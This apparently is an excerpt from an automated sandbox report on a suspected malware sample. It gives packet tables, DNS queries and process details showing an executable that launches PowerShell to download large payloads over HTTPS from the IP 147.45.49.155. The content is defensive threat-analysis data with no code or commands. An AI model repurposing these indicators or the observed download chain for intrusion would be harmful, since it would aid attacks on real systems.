Dec 27, 2024 15:00:55.459043026 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.459070921 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.459088087 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.483854055 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.483880997 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.483921051 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.483949900 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.483966112 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.484000921 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.539143085 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.539169073 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.539253950 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.539277077 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.539319992 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.619318962 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.619349957 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.619457006 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.619483948 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.619501114 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.619522095 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.639045954 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.639069080 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.639158964 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.639174938 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.639214993 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.658235073 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.658260107 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.658333063 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.658349991 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.658410072 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.674009085 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.674037933 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.674107075 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.674124002 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.674161911 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.684941053 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.684962988 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.685059071 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.685077906 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.685116053 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.726851940 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.726877928 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.726996899 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.727024078 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.727065086 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.811470985 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.811489105 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.811630964 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.811656952 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.811697006 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.821892977 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.821916103 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.822016001 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.822036982 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.822077990 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.830894947 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.830912113 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.830967903 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.830986977 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.831033945 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.841311932 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.841330051 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.841414928 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.841439009 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.841455936 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.841485977 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.850842953 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.850858927 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.851008892 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.851031065 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.851066113 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.861161947 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.861179113 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.861251116 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.861272097 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.861318111 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.871467113 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.871493101 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.871541023 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.871563911 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.871578932 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.871597052 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.994740963 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.994788885 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.994905949 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:55.994931936 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:55.994972944 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.000566959 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.000582933 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.000650883 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.000669003 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.000710011 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.007765055 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.007778883 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.007832050 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.007847071 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.007884979 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.015137911 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.015152931 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.015216112 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.015230894 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.015280008 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.021526098 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.021541119 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.021620989 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.021636009 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.021676064 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.029331923 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.029355049 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.029443026 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.029457092 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.029493093 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.035721064 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.035742044 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.035852909 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.035872936 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.035914898 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.042941093 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.042957067 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.043021917 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.043039083 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.043076038 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.186737061 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.186793089 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.186953068 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.186978102 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.187016964 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.191679955 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.191698074 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.191764116 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.191781998 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.191819906 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.197916985 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.197932959 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.197979927 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.197997093 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.198030949 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.203294039 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.203308105 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.203376055 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.203394890 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.203428984 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.209867001 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.209891081 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.209964037 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.209980965 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.210020065 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.215396881 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.215419054 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.215491056 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.215507030 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.215553045 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.221683979 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.221703053 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.221766949 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.221781015 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.221817017 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.227644920 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.227662086 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.227718115 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.227739096 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.227771044 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.379093885 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.379112959 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.379208088 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.379240990 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.379287958 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.383666992 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.383686066 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.383744001 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.383764029 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.383809090 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.389455080 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.389472008 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.389539957 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.389559031 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.389615059 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.395072937 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.395091057 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.395184994 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.395205021 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.395239115 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.400280952 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.400299072 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.400341034 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.400365114 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.400379896 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.400402069 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.406307936 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.406323910 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.406373024 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.406393051 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.406409979 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.406430006 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.411431074 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.411451101 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.411521912 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.411540031 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.411556005 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.411571980 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.417368889 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.417383909 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.417458057 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.417475939 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.417511940 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.570966959 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.570995092 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.571127892 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.571155071 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.571197033 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.575838089 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.575854063 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.575923920 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.575942039 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.575982094 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.581537962 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.581583023 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.581654072 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.581681013 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.581695080 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.581722975 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.586647987 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.586663961 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.586736917 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.586759090 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.586812019 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.592544079 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.592559099 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Dec 27, 2024 15:00:56.592627048 CET | 49723 | 443 | 192.168.2.9 | 147.45.49.155 |
Dec 27, 2024 15:00:56.592643976 CET | 443 | 49723 | 147.45.49.155 | 192.168.2.9 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Dec 27, 2024 15:00:47.610130072 CET | 56729 | 53 | 192.168.2.9 | 1.1.1.1 |
Dec 27, 2024 15:00:47.918257952 CET | 53 | 56729 | 1.1.1.1 | 192.168.2.9 |
Dec 27, 2024 15:00:59.287691116 CET | 56855 | 53 | 192.168.2.9 | 1.1.1.1 |
Dec 27, 2024 15:00:59.518891096 CET | 53 | 56855 | 1.1.1.1 | 192.168.2.9 |
Dec 27, 2024 15:01:15.090598106 CET | 58499 | 53 | 192.168.2.9 | 1.1.1.1 |
Dec 27, 2024 15:01:15.429806948 CET | 53 | 58499 | 1.1.1.1 | 192.168.2.9 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Dec 27, 2024 15:00:47.610130072 CET | 192.168.2.9 | 1.1.1.1 | 0x36a9 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 27, 2024 15:00:59.287691116 CET | 192.168.2.9 | 1.1.1.1 | 0xc0ea | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Dec 27, 2024 15:01:15.090598106 CET | 192.168.2.9 | 1.1.1.1 | 0x789f | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Dec 27, 2024 15:00:47.918257952 CET | 1.1.1.1 | 192.168.2.9 | 0x36a9 | No error (0) | 147.45.49.155 | A (IP address) | IN (0x0001) | false | ||
Dec 27, 2024 15:00:59.518891096 CET | 1.1.1.1 | 192.168.2.9 | 0xc0ea | Name error (3) | none | none | A (IP address) | IN (0x0001) | false | |
Dec 27, 2024 15:01:15.429806948 CET | 1.1.1.1 | 192.168.2.9 | 0x789f | Name error (3) | none | none | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.9 | 49707 | 147.45.49.155 | 443 | 1004 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-27 14:00:49 UTC | 170 | OUT | |
2024-12-27 14:00:50 UTC | 397 | IN | |
2024-12-27 14:00:50 UTC | 16384 | IN | |
2024-12-27 14:00:50 UTC | 16384 | IN | |
2024-12-27 14:00:50 UTC | 16384 | IN | |
2024-12-27 14:00:50 UTC | 16384 | IN | |
2024-12-27 14:00:50 UTC | 16384 | IN | |
2024-12-27 14:00:50 UTC | 16384 | IN | |
2024-12-27 14:00:50 UTC | 16384 | IN | |
2024-12-27 14:00:50 UTC | 16384 | IN | |
2024-12-27 14:00:50 UTC | 16384 | IN | |
2024-12-27 14:00:50 UTC | 16384 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.9 | 49723 | 147.45.49.155 | 443 | 6848 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-12-27 14:00:54 UTC | 82 | OUT | |
2024-12-27 14:00:55 UTC | 425 | IN | |
2024-12-27 14:00:55 UTC | 16384 | IN | |
2024-12-27 14:00:55 UTC | 16384 | IN | |
2024-12-27 14:00:55 UTC | 16384 | IN | |
2024-12-27 14:00:55 UTC | 16384 | IN | |
2024-12-27 14:00:55 UTC | 16384 | IN | |
2024-12-27 14:00:55 UTC | 16384 | IN | |
2024-12-27 14:00:55 UTC | 16384 | IN | |
2024-12-27 14:00:55 UTC | 16384 | IN | |
2024-12-27 14:00:55 UTC | 16384 | IN | |
2024-12-27 14:00:55 UTC | 16384 | IN |
Target ID: | 0 |
Start time: | 09:00:43 |
Start date: | 27/12/2024 |
Path: | C:\Users\user\Desktop\TCKxnQ5CPn.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff69db30000 |
File size: | 1'083'904 bytes |
MD5 hash: | 2A89603D2620B2A62113513709E38E95 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 09:00:43 |
Start date: | 27/12/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff760310000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 09:00:43 |
Start date: | 27/12/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff70f010000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 09:00:50 |
Start date: | 27/12/2024 |
Path: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff760310000 |
File size: | 452'608 bytes |
MD5 hash: | 04029E121A0CFA5991749937DD22A1D9 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
